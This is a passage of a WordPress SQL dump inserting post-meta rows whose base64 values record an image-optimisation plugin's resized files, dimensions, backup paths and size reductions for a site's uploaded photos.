LTgyMDAtMTYwMHgxMDY3LmpwZyIsIndpZHRoIjoxNjAwLCJoZWlnaHQiOjEwNjcsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvUmVsZWFzeXMtODIwMC0xNjAweDEwNjcuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOVwvUmVsZWFzeXMtODIwMC0xNjAweDEwNjcuanBnIiwicmVkdWN0aW9uIjoxMzkzMCwidGltZSI6MTQ4MzU2MzU5NSwiaWQiOjE3ODJ9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvUmVsZWFzeXMtODIwMC0yNTB4MjUwLmpwZyIsIndpZHRoIjoyNTAsImhlaWdodCI6MjUwLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL1JlbGVhc3lzLTgyMDAtMjUweDI1MC5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA5XC9SZWxlYXN5cy04MjAwLTI1MHgyNTAuanBnIiwicmVkdWN0aW9uIjo2MzEsInRpbWUiOjE0ODM1NjM1OTgsImlkIjoxNzgyfSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL1JlbGVhc3lzLTgyMDAtMjAweDIwMC5qcGciLCJ3aWR0aCI6MjAwLCJoZWlnaHQiOjIwMCwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9SZWxlYXN5cy04MjAwLTIwMHgyMDAuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOVwvUmVsZWFzeXMtODIwMC0yMDB4MjAwLmpwZyIsInJlZHVjdGlvbiI6NTI4LCJ0aW1lIjoxNDgzNTYzNjAxLCJpZCI6MTc4Mn0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9SZWxlYXN5cy04MjAwLTIyNXgyMjUuanBnIiwid2lkdGgiOjIyNSwiaGVpZ2h0IjoyMjUsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvUmVsZWFzeXMtODIwMC0yMjV4MjI1LmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDlcL1JlbGVhc3lzLTgyMDAtMjI1eDIyNS5qcGciLCJyZWR1Y3Rpb24iOjU5MywidGltZSI6MTQ4MzU2MzYwNSwiaWQiOjE3ODJ9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvUmVsZWFzeXMtODIwMC01MTB4NjAwLmpwZyIsIndpZHRoIjo1MTAsImhlaWdodCI6NjAwLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL1JlbGVhc3lzLTgyMDAtNTEweDYwMC5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA5XC9SZWxlYXN5cy04MjAwLTUxMHg2MDAuanBnIiwicmVkdWN0aW9uIjoyMDg4LCJ0aW1lIjoxNDgzNTYzNjA4LCJpZCI6MTc4Mn0seyJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL1JlbGVhc3lzLTgyMDAtMTYweDE2MC5qcGciLCJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9SZWxlYXN5cy04MjAwLTE2MHgxNjAuanBnIiwid2lkdGgiOiIxNjAiLCJoZWlnaHQiOiIxNjAiLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOVwvUmVsZWFzeXMtODIwMC0xNjB4MTYwLmpwZyIsInJlZHVjdGlvbiI6NDEyLCJ0aW1lIjoxNDgzNTYzNjExLCJpZCI6MTc4Mn0seyJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL1JlbGVhc3lzLTgyMDAtMjI1eDM2MC5qcGciLCJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9SZWxlYXN5cy04MjAwLTIyNXgzNjAuanBnIiwid2lkdGgiOiIyMjUiLCJoZWlnaHQiOiIzNjAiLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOVwvUmVsZWFzeXMtODIwMC0yMjV4MzYwLmpwZyIsInJlZHVjdGlvbiI6NjcwLCJ0aW1lIjoxNDgzNTYzNjE1LCJpZCI6MTc4Mn0seyJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL1JlbGVhc3lzLTgyMDAtMzAweDMwMC5qcGciLCJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9SZWxlYXN5cy04MjAwLTMwMHgzMDAuanBnIiwid2lkdGgiOiIzMDAiLCJoZWlnaHQiOiIzMDAiLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOVwvUmVsZWFzeXMtODIwMC0zMDB4MzAwLmpwZyIsInJlZHVjdGlvbiI6Njk1LCJ0aW1lIjoxNDgzNTYzNjE4LCJpZCI6MTc4Mn0seyJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL1JlbGVhc3lzLTgyMDAtNDUweDMwMC5qcGciLCJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9SZWxlYXN5cy04MjAwLTQ1MHgzMDAuanBnIiwid2lkdGgiOiI0NTAiLCJoZWlnaHQiOiIzMDAiLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOVwvUmVsZWFzeXMtODIwMC00NTB4MzAwLmpwZyIsInJlZHVjdGlvbiI6MTAyMCwidGltZSI6MTQ4MzU2MzYyMiwiaWQiOjE3ODJ9LHsidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9SZWxlYXN5cy04MjAwLTkweDkwLmpwZyIsImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL1JlbGVhc3lzLTgyMDAtOTB4OTAuanBnIiwid2lkdGgiOiI5MCIsImhlaWdodCI6IjkwIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDlcL1JlbGVhc3lzLTgyMDAtOTB4OTAuanBnIiwicmVkdWN0aW9uIjozODQsInRpbWUiOjE0ODM1NjM2MjUsImlkIjoxNzgyfV0='); 
INSERT INTO `wp_postmeta` VALUES (29192, 1781, 'wpfc_optimisation_reduction', '27393'); 
INSERT INTO `wp_postmeta` VALUES (29193, 1781, 'wpfc_optimisation', 'W3siZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvUmVsZWFzeXMtODkuanBnIiwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9SZWxlYXN5cy04OS5qcGciLCJ3aWR0aCI6NTE4NCwiaGVpZ2h0IjozNDU2LCJtaW1lX3R5cGUiOiIiLCJlcnJvcl9jb2RlIjo5LCJ0aW1lIjoxNDgzNTYzNjI5LCJpZCI6IjE3ODEifSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL1JlbGVhc3lzLTg5LTM0MHgzNDAuanBnIiwid2lkdGgiOjM0MCwiaGVpZ2h0IjozNDAsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvUmVsZWFzeXMtODktMzQweDM0MC5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA5XC9SZWxlYXN5cy04OS0zNDB4MzQwLmpwZyIsInJlZHVjdGlvbiI6OTI4LCJ0aW1lIjoxNDgzNTYzNjMzLCJpZCI6MTc4MX0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9SZWxlYXN5cy04OS04MDB4NTMzLmpwZyIsIndpZHRoIjo4MDAsImhlaWdodCI6NTMzLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL1JlbGVhc3lzLTg5LTgwMHg1MzMuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOVwvUmVsZWFzeXMtODktODAweDUzMy5qcGciLCJyZWR1Y3Rpb24iOjMyMjMsInRpbWUiOjE0ODM1NjM2MzYsImlkIjoxNzgxfSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL1JlbGVhc3lzLTg5LTc2OHg1MTIuanBnIiwid2lkdGgiOjc2OCwiaGVpZ2h0Ijo1MTIsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvUmVsZWFzeXMtODktNzY4eDUxMi5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA5XC9SZWxlYXN5cy04OS03Njh4NTEyLmpwZyIsInJlZHVjdGlvbiI6Mjg4NSwidGltZSI6MTQ4MzU2MzY0MCwiaWQiOjE3ODF9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvUmVsZWFzeXMtODktMTYwMHgxMDY3LmpwZyIsIndpZHRoIjoxNjAwLCJoZWlnaHQiOjEwNjcsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvUmVsZWFzeXMtODktMTYwMHgxMDY3LmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDlcL1JlbGVhc3lzLTg5LTE2MDB4MTA2Ny5qcGciLCJyZWR1Y3Rpb24iOjEzNDkzLCJ0aW1lIjoxNDgzNTYzNjQzLCJpZCI6MTc4MX0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9SZWxlYXN5cy04OS0yNTB4MjUwLmpwZyIsIndpZHRoIjoyNTAsImhlaWdodCI6MjUwLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL1JlbGVhc3lzLTg5LTI1MHgyNTAuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOVwvUmVsZWFzeXMtODktMjUweDI1MC5qcGciLCJyZWR1Y3Rpb24iOjYyOSwidGltZSI6MTQ4MzU2MzY0NywiaWQiOjE3ODF9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvUmVsZWFzeXMtODktMjAweDIwMC5qcGciLCJ3aWR0aCI6MjAwLCJoZWlnaHQiOjIwMCwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9SZWxlYXN5cy04OS0yMDB4MjAwLmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDlcL1JlbGVhc3lzLTg5LTIwMHgyMDAuanBnIiwicmVkdWN0aW9uIjo1MjUsInRpbWUiOjE0ODM1NjM2NTAsImlkIjoxNzgxfSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL1JlbGVhc3lzLTg5LTIyNXgyMjUuanBnIiwid2lkdGgiOjIyNSwiaGVpZ2h0IjoyMjUsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvUmVsZWFzeXMtODktMjI1eDIyNS5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA5XC9SZWxlYXN5cy04OS0yMjV4MjI1LmpwZyIsInJlZHVjdGlvbiI6NjEwLCJ0aW1lIjoxNDgzNTYzNjUzLCJpZCI6MTc4MX0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9SZWxlYXN5cy04OS01MTB4NjAwLmpwZyIsIndpZHRoIjo1MTAsImhlaWdodCI6NjAwLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL1JlbGVhc3lzLTg5LTUxMHg2MDAuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOVwvUmVsZWFzeXMtODktNTEweDYwMC5qcGciLCJyZWR1Y3Rpb24iOjE5NjEsInRpbWUiOjE0ODM1NjM2NTcsImlkIjoxNzgxfSx7InVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvUmVsZWFzeXMtODktMTYweDE2MC5qcGciLCJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9SZWxlYXN5cy04OS0xNjB4MTYwLmpwZyIsIndpZHRoIjoiMTYwIiwiaGVpZ2h0IjoiMTYwIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDlcL1JlbGVhc3lzLTg5LTE2MHgxNjAuanBnIiwicmVkdWN0aW9uIjo0MzIsInRpbWUiOjE0ODM1NjM2NjAsImlkIjoxNzgxfSx7InVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvUmVsZWFzeXMtODktMjI1eDM2MC5qcGciLCJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9SZWxlYXN5cy04OS0yMjV4MzYwLmpwZyIsIndpZHRoIjoiMjI1IiwiaGVpZ2h0IjoiMzYwIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDlcL1JlbGVhc3lzLTg5LTIyNXgzNjAuanBnIiwicmVkdWN0aW9uIjo2MTAsInRpbWUiOjE0ODM1NjM2NjMsImlkIjoxNzgxfSx7InVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvUmVsZWFzeXMtODktMzAweDMwMC5qcGciLCJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9SZWxlYXN5cy04OS0zMDB4MzAwLmpwZyIsIndpZHRoIjoiMzAwIiwiaGVpZ2h0IjoiMzAwIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDlcL1JlbGVhc3lzLTg5LTMwMHgzMDAuanBnIiwicmVkdWN0aW9uIjo2ODUsInRpbWUiOjE0ODM1NjM2NjcsImlkIjoxNzgxfSx7InVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvUmVsZWFzeXMtODktNDUweDMwMC5qcGciLCJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9SZWxlYXN5cy04OS00NTB4MzAwLmpwZyIsIndpZHRoIjoiNDUwIiwiaGVpZ2h0IjoiMzAwIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDlcL1JlbGVhc3lzLTg5LTQ1MHgzMDAuanBnIiwicmVkdWN0aW9uIjoxMDIzLCJ0aW1lIjoxNDgzNTYzNjcwLCJpZCI6MTc4MX0seyJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL1JlbGVhc3lzLTg5LTkweDkwLmpwZyIsImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL1JlbGVhc3lzLTg5LTkweDkwLmpwZyIsIndpZHRoIjoiOTAiLCJoZWlnaHQiOiI5MCIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA5XC9SZWxlYXN5cy04OS05MHg5MC5qcGciLCJyZWR1Y3Rpb24iOjM4OSwidGltZSI6MTQ4MzU2MzY3NCwiaWQiOjE3ODF9XQ=='); 
INSERT INTO `wp_postmeta` VALUES (29194, 1780, 'wpfc_optimisation_reduction', '27804'); 
INSERT INTO `wp_postmeta` VALUES (29195, 1780, 'wpfc_optimisation', 'W3siZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvcmVsZWFzeXMtODguanBnIiwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9yZWxlYXN5cy04OC5qcGciLCJ3aWR0aCI6NTE4NCwiaGVpZ2h0IjozNDU2LCJtaW1lX3R5cGUiOiIiLCJlcnJvcl9jb2RlIjo5LCJ0aW1lIjoxNDgzNTYzNjc4LCJpZCI6IjE3ODAifSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL3JlbGVhc3lzLTg4LTM0MHgzNDAuanBnIiwid2lkdGgiOjM0MCwiaGVpZ2h0IjozNDAsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvcmVsZWFzeXMtODgtMzQweDM0MC5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA5XC9yZWxlYXN5cy04OC0zNDB4MzQwLmpwZyIsInJlZHVjdGlvbiI6OTYwLCJ0aW1lIjoxNDgzNTYzNjgyLCJpZCI6MTc4MH0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9yZWxlYXN5cy04OC04MDB4NTMzLmpwZyIsIndpZHRoIjo4MDAsImhlaWdodCI6NTMzLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL3JlbGVhc3lzLTg4LTgwMHg1MzMuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOVwvcmVsZWFzeXMtODgtODAweDUzMy5qcGciLCJyZWR1Y3Rpb24iOjMyOTQsInRpbWUiOjE0ODM1NjM2ODUsImlkIjoxNzgwfSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL3JlbGVhc3lzLTg4LTc2OHg1MTIuanBnIiwid2lkdGgiOjc2OCwiaGVpZ2h0Ijo1MTIsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvcmVsZWFzeXMtODgtNzY4eDUxMi5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA5XC9yZWxlYXN5cy04OC03Njh4NTEyLmpwZyIsInJlZHVjdGlvbiI6Mjk5MSwidGltZSI6MTQ4MzU2MzY4OCwiaWQiOjE3ODB9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvcmVsZWFzeXMtODgtMTYwMHgxMDY3LmpwZyIsIndpZHRoIjoxNjAwLCJoZWlnaHQiO